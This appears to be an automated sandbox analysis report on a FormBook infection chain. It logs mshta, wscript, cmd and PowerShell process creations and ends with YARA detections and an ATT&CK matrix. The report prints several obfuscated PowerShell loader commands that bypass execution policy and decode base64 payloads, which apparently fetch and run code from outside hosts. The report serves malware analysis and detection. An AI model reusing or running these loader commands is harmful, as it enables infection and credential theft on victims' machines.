invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'je95q1a0tjj6rklbicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhreqtdflqrsagicagicagicagicagicagicagicagicagicagicaglu1ltujlukrfrklusvrpt04gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnb04ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagewpcr1usc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbmcixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagierfcsx1aw50icagicagicagicagicagicagicagicagicagicagicbuved5vhnbbudpayxjbnrqdhigicagicagicagicagicagicagicagicagicagicagietbrkspoycgicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicaiafdyzhhtvwfxzyigicagicagicagicagicagicagicagicagicagicagic1uyu1fu1bhy2ugicagicagicagicagicagicagicagicagicagicagifj3vudyuiagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagje95q1a0tjj6rklbojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtq2ljcwljexmy4ymdavmjmxl3nlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmb3j1lnrjriisiirftly6qvbqrefuqvxzzwv0agvizxn0bwfnawnhbhroawduc2dpdmvnb29kzm8udmjtiiwwldapo3n0qxjulxnsrwvwkdmpo0lpicagicagicagicagicagicagicagicagicagicagicaijevodjpbufbeqvrbxhnlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmby52ylmi'+[char]0x22+'))')))"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'je95q1a0tjj6rklbicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhreqtdflqrsagicagicagicagicagicagicagicagicagicagicaglu1ltujlukrfrklusvrpt04gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnb04ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagewpcr1usc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbmcixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagierfcsx1aw50icagicagicagicagicagicagicagicagicagicagicbuved5vhnbbudpayxjbnrqdhigicagicagicagicagicagicagicagicagicagicagietbrkspoycgicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicaiafdyzhhtvwfxzyigicagicagicagicagicagicagicagicagicagicagic1uyu1fu1bhy2ugicagicagicagicagicagicagicagicagicagicagifj3vudyuiagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagje95q1a0tjj6rklbojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtq2ljcwljexmy4ymdavmjmxl3nlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmb3j1lnrjriisiirftly6qvbqrefuqvxzzwv0agvizxn0bwfnawnhbhroawduc2dpdmvnb29kzm8udmjtiiwwldapo3n0qxjulxnsrwvwkdmpo0lpicagicagicagicagicagicagicagicagicagicagicaijevodjpbufbeqvrbxhnlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmby52ylmi'+[char]0x22+'))')))"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $caviloso = 'jglkaw9lbgvjdhjpy2lkywrlid0gj2h0dhbzoi8vmtaxni5mawxlbwfpbc5jb20vyxbpl2zpbguvz2v0p2zpbgvrzxk9sfrvr19fexj1rfiwt0fasdbisep5zxbvclhtdkzfatzqogj3zvrlv0jddte5egnialfonvrrc2e0t0cwtxfjy3fxtkxszyzwa192awq9ztaxmdk2mzhjowjmyjk1nze3mzi3otqzntzhmwzmnmmgjzskdxj1z3vhaw8gpsbozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50oyrlbmnlzmfsyxj0bya9icr1cnvndwfpby5eb3dubg9hzerhdgeojglkaw9lbgvjdhjpy2lkywrlktskahltzw5vdg9tawegpsbbu3lzdgvtllrlehqurw5jb2rpbmddojpvvey4lkdldfn0cmluzygkzw5jzwzhbgfydg8poyrpbnrlcm1pyxigpsanpdxcqvnfnjrfu1rbulq+pic7jgnvcglvc2ftzw50zsa9icc8pejbu0u2nf9ftkq+pic7jhryyxnsywrhcia9icroew1lbm90b21pys5jbmrlee9mkcrpbnrlcm1pyxipoyryzxnwb25kb25hid0gjgh5bwvub3rvbwlhlkluzgv4t2yojgnvcglvc2ftzw50zsk7jhryyxnsywrhciatz2ugmcatyw5kicryzxnwb25kb25hic1ndcakdhjhc2xhzgfyoyr0cmfzbgfkyxigkz0gjgludgvybwlhci5mzw5ndgg7jgvtcgvsawnhcia9icryzxnwb25kb25hic0gjhryyxnsywrhcjskdw5ndwlmb3jtzsa9icroew1lbm90b21pys5tdwjzdhjpbmcojhryyxnsywrhciwgjgvtcgvsawnhcik7jg1vbgrpbmegpsatam9pbiaojhvuz3vpzm9ybwuuvg9dagfyqxjyyxkoksb8iezvckvhy2gtt2jqzwn0ihsgjf8gfslblteuli0ojhvuz3vpzm9ybwuutgvuz3rokv07jhjhymlzywx0b25hid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygkbw9szgluysk7jg9jzwfub2xvz2lzdgegpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcryywjpc2fsdg9uysk7jgfscglyy2hlid0gw2rubglilklplkhvbwvdlkdlde1ldghvzcgnvkfjjyk7jgfscglyy2hllkludm9rzsgkbnvsbcwgqcgndhh0lkfaukhiqvovmtmylzawmi4zmteumdcunjqxly86chr0accsicckcmvzc3vwaw5hcicsicckcmvzc3vwaw5hcicsicckcmvzc3vwaw5hcicsicdhc3buzxrfy29tcglszxinlcanjhjlc3n1cgluyxinlcanjhjlc3n1cgluyxinlcckcmvzc3vwaw5hcicsjyryzxnzdxbpbmfyjywnjhjlc3n1cgluyxinlcckcmvzc3vwaw5hcicsjyryzxnzdxbpbmfyjywnmscsjyryzxnzdxbpbmfyjykpow==';$bernarda = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($caviloso));invoke-expression $bernarda
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'je95q1a0tjj6rklbicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhreqtdflqrsagicagicagicagicagicagicagicagicagicagicaglu1ltujlukrfrklusvrpt04gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnb04ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagewpcr1usc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbmcixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagierfcsx1aw50icagicagicagicagicagicagicagicagicagicagicbuved5vhnbbudpayxjbnrqdhigicagicagicagicagicagicagicagicagicagicagietbrkspoycgicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicaiafdyzhhtvwfxzyigicagicagicagicagicagicagicagicagicagicagic1uyu1fu1bhy2ugicagicagicagicagicagicagicagicagicagicagifj3vudyuiagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagje95q1a0tjj6rklbojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtq2ljcwljexmy4ymdavmjmxl3nlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmb3j1lnrjriisiirftly6qvbqrefuqvxzzwv0agvizxn0bwfnawnhbhroawduc2dpdmvnb29kzm8udmjtiiwwldapo3n0qxjulxnsrwvwkdmpo0lpicagicagicagicagicagicagicagicagicagicagicaijevodjpbufbeqvrbxhnlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmby52ylmi'+[char]0x22+'))')))"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'je95q1a0tjj6rklbicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhreqtdflqrsagicagicagicagicagicagicagicagicagicagicaglu1ltujlukrfrklusvrpt04gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnb04ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagewpcr1usc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbmcixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagierfcsx1aw50icagicagicagicagicagicagicagicagicagicagicbuved5vhnbbudpayxjbnrqdhigicagicagicagicagicagicagicagicagicagicagietbrkspoycgicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicaiafdyzhhtvwfxzyigicagicagicagicagicagicagicagicagicagicagic1uyu1fu1bhy2ugicagicagicagicagicagicagicagicagicagicagifj3vudyuiagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagje95q1a0tjj6rklbojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtq2ljcwljexmy4ymdavmjmxl3nlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmb3j1lnrjriisiirftly6qvbqrefuqvxzzwv0agvizxn0bwfnawnhbhroawduc2dpdmvnb29kzm8udmjtiiwwldapo3n0qxjulxnsrwvwkdmpo0lpicagicagicagicagicagicagicagicagicagicagicaijevodjpbufbeqvrbxhnlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmby52ylmi'+[char]0x22+'))')))"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $caviloso = 'jglkaw9lbgvjdhjpy2lkywrlid0gj2h0dhbzoi8vmtaxni5mawxlbwfpbc5jb20vyxbpl2zpbguvz2v0p2zpbgvrzxk9sfrvr19fexj1rfiwt0fasdbisep5zxbvclhtdkzfatzqogj3zvrlv0jddte5egnialfonvrrc2e0t0cwtxfjy3fxtkxszyzwa192awq9ztaxmdk2mzhjowjmyjk1nze3mzi3otqzntzhmwzmnmmgjzskdxj1z3vhaw8gpsbozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50oyrlbmnlzmfsyxj0bya9icr1cnvndwfpby5eb3dubg9hzerhdgeojglkaw9lbgvjdhjpy2lkywrlktskahltzw5vdg9tawegpsbbu3lzdgvtllrlehqurw5jb2rpbmddojpvvey4lkdldfn0cmluzygkzw5jzwzhbgfydg8poyrpbnrlcm1pyxigpsanpdxcqvnfnjrfu1rbulq+pic7jgnvcglvc2ftzw50zsa9icc8pejbu0u2nf9ftkq+pic7jhryyxnsywrhcia9icroew1lbm90b21pys5jbmrlee9mkcrpbnrlcm1pyxipoyryzxnwb25kb25hid0gjgh5bwvub3rvbwlhlkluzgv4t2yojgnvcglvc2ftzw50zsk7jhryyxnsywrhciatz2ugmcatyw5kicryzxnwb25kb25hic1ndcakdhjhc2xhzgfyoyr0cmfzbgfkyxigkz0gjgludgvybwlhci5mzw5ndgg7jgvtcgvsawnhcia9icryzxnwb25kb25hic0gjhryyxnsywrhcjskdw5ndwlmb3jtzsa9icroew1lbm90b21pys5tdwjzdhjpbmcojhryyxnsywrhciwgjgvtcgvsawnhcik7jg1vbgrpbmegpsatam9pbiaojhvuz3vpzm9ybwuuvg9dagfyqxjyyxkoksb8iezvckvhy2gtt2jqzwn0ihsgjf8gfslblteuli0ojhvuz3vpzm9ybwuutgvuz3rokv07jhjhymlzywx0b25hid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygkbw9szgluysk7jg9jzwfub2xvz2lzdgegpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcryywjpc2fsdg9uysk7jgfscglyy2hlid0gw2rubglilklplkhvbwvdlkdlde1ldghvzcgnvkfjjyk7jgfscglyy2hllkludm9rzsgkbnvsbcwgqcgndhh0lkfaukhiqvovmtmylzawmi4zmteumdcunjqxly86chr0accsicckcmvzc3vwaw5hcicsicckcmvzc3vwaw5hcicsicckcmvzc3vwaw5hcicsicdhc3buzxrfy29tcglszxinlcanjhjlc3n1cgluyxinlcanjhjlc3n1cgluyxinlcckcmvzc3vwaw5hcicsjyryzxnzdxbpbmfyjywnjhjlc3n1cgluyxinlcckcmvzc3vwaw5hcicsjyryzxnzdxbpbmfyjywnmscsjyryzxnzdxbpbmfyjykpow==';$bernarda = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($caviloso));invoke-expression $bernardaJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'je95q1a0tjj6rklbicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhreqtdflqrsagicagicagicagicagicagicagicagicagicagicaglu1ltujlukrfrklusvrpt04gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnb04ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagewpcr1usc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbmcixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagierfcsx1aw50icagicagicagicagicagicagicagicagicagicagicbuved5vhnbbudpayxjbnrqdhigicagicagicagicagicagicagicagicagicagicagietbrkspoycgicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicaiafdyzhhtvwfxzyigicagicagicagicagicagicagicagicagicagicagic1uyu1fu1bhy2ugicagicagicagicagicagicagicagicagicagicagifj3vudyuiagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagje95q1a0tjj6rklbojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtq2ljcwljexmy4ymdavmjmxl3nlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmb3j1lnrjriisiirftly6qvbqrefuqvxzzwv0agvizxn0bwfnawnhbhroawduc2dpdmvnb29kzm8udmjtiiwwldapo3n0qxjulxnsrwvwkdmpo0lpicagicagicagicagicagicagicagicagicagicagicaijevodjpbufbeqvrbxhnlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmby52ylmi'+[char]0x22+'))')))"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'je95q1a0tjj6rklbicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhreqtdflqrsagicagicagicagicagicagicagicagicagicagicaglu1ltujlukrfrklusvrpt04gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnb04ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagewpcr1usc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbmcixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagierfcsx1aw50icagicagicagicagicagicagicagicagicagicagicbuved5vhnbbudpayxjbnrqdhigicagicagicagicagicagicagicagicagicagicagietbrkspoycgicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicaiafdyzhhtvwfxzyigicagicagicagicagicagicagicagicagicagicagic1uyu1fu1bhy2ugicagicagicagicagicagicagicagicagicagicagifj3vudyuiagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagje95q1a0tjj6rklbojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtq2ljcwljexmy4ymdavmjmxl3nlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmb3j1lnrjriisiirftly6qvbqrefuqvxzzwv0agvizxn0bwfnawnhbhroawduc2dpdmvnb29kzm8udmjtiiwwldapo3n0qxjulxnsrwvwkdmpo0lpicagicagicagicagicagicagicagicagicagicagicaijevodjpbufbeqvrbxhnlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmby52ylmi'+[char]0x22+'))')))"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $caviloso = 'jglkaw9lbgvjdhjpy2lkywrlid0gj2h0dhbzoi8vmtaxni5mawxlbwfpbc5jb20vyxbpl2zpbguvz2v0p2zpbgvrzxk9sfrvr19fexj1rfiwt0fasdbisep5zxbvclhtdkzfatzqogj3zvrlv0jddte5egnialfonvrrc2e0t0cwtxfjy3fxtkxszyzwa192awq9ztaxmdk2mzhjowjmyjk1nze3mzi3otqzntzhmwzmnmmgjzskdxj1z3vhaw8gpsbozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50oyrlbmnlzmfsyxj0bya9icr1cnvndwfpby5eb3dubg9hzerhdgeojglkaw9lbgvjdhjpy2lkywrlktskahltzw5vdg9tawegpsbbu3lzdgvtllrlehqurw5jb2rpbmddojpvvey4lkdldfn0cmluzygkzw5jzwzhbgfydg8poyrpbnrlcm1pyxigpsanpdxcqvnfnjrfu1rbulq+pic7jgnvcglvc2ftzw50zsa9icc8pejbu0u2nf9ftkq+pic7jhryyxnsywrhcia9icroew1lbm90b21pys5jbmrlee9mkcrpbnrlcm1pyxipoyryzxnwb25kb25hid0gjgh5bwvub3rvbwlhlkluzgv4t2yojgnvcglvc2ftzw50zsk7jhryyxnsywrhciatz2ugmcatyw5kicryzxnwb25kb25hic1ndcakdhjhc2xhzgfyoyr0cmfzbgfkyxigkz0gjgludgvybwlhci5mzw5ndgg7jgvtcgvsawnhcia9icryzxnwb25kb25hic0gjhryyxnsywrhcjskdw5ndwlmb3jtzsa9icroew1lbm90b21pys5tdwjzdhjpbmcojhryyxnsywrhciwgjgvtcgvsawnhcik7jg1vbgrpbmegpsatam9pbiaojhvuz3vpzm9ybwuuvg9dagfyqxjyyxkoksb8iezvckvhy2gtt2jqzwn0ihsgjf8gfslblteuli0ojhvuz3vpzm9ybwuutgvuz3rokv07jhjhymlzywx0b25hid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygkbw9szgluysk7jg9jzwfub2xvz2lzdgegpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcryywjpc2fsdg9uysk7jgfscglyy2hlid0gw2rubglilklplkhvbwvdlkdlde1ldghvzcgnvkfjjyk7jgfscglyy2hllkludm9rzsgkbnvsbcwgqcgndhh0lkfaukhiqvovmtmylzawmi4zmteumdcunjqxly86chr0accsicckcmvzc3vwaw5hcicsicckcmvzc3vwaw5hcicsicckcmvzc3vwaw5hcicsicdhc3buzxrfy29tcglszxinlcanjhjlc3n1cgluyxinlcanjhjlc3n1cgluyxinlcckcmvzc3vwaw5hcicsjyryzxnzdxbpbmfyjywnjhjlc3n1cgluyxinlcckcmvzc3vwaw5hcicsjyryzxnzdxbpbmfyjywnmscsjyryzxnzdxbpbmfyjykpow==';$bernarda = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($caviloso));invoke-expression $bernarda
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 27.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 27.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000001B.00000002.509298031.0000000000180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000002.509601721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 27.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 27.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000001B.00000002.509298031.0000000000180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000002.509601721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information121
              Scripting              		Valid Accounts111
              Command and Scripting Interpreter              		121
              Scripting              		211
              Process Injection              		1
              Masquerading              		OS Credential Dumping2
              Security Software Discovery              		Remote Services1
              Email Collection              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts23
              Exploitation for Client Execution              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		31
              Virtualization/Sandbox Evasion              		LSASS Memory1
              Process Discovery              		Remote Desktop Protocol1
              Archive Collected Data              		3
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts3
              PowerShell              		Logon Script (Windows)Logon Script (Windows)211
              Process Injection              		Security Account Manager31
              Virtualization/Sandbox Evasion              		SMB/Windows Admin Shares1
              Clipboard Data              		2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Deobfuscate/Decode Files or Information              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture13
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script21
              Obfuscated Files or Information              		LSA Secrets1
              Remote System Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
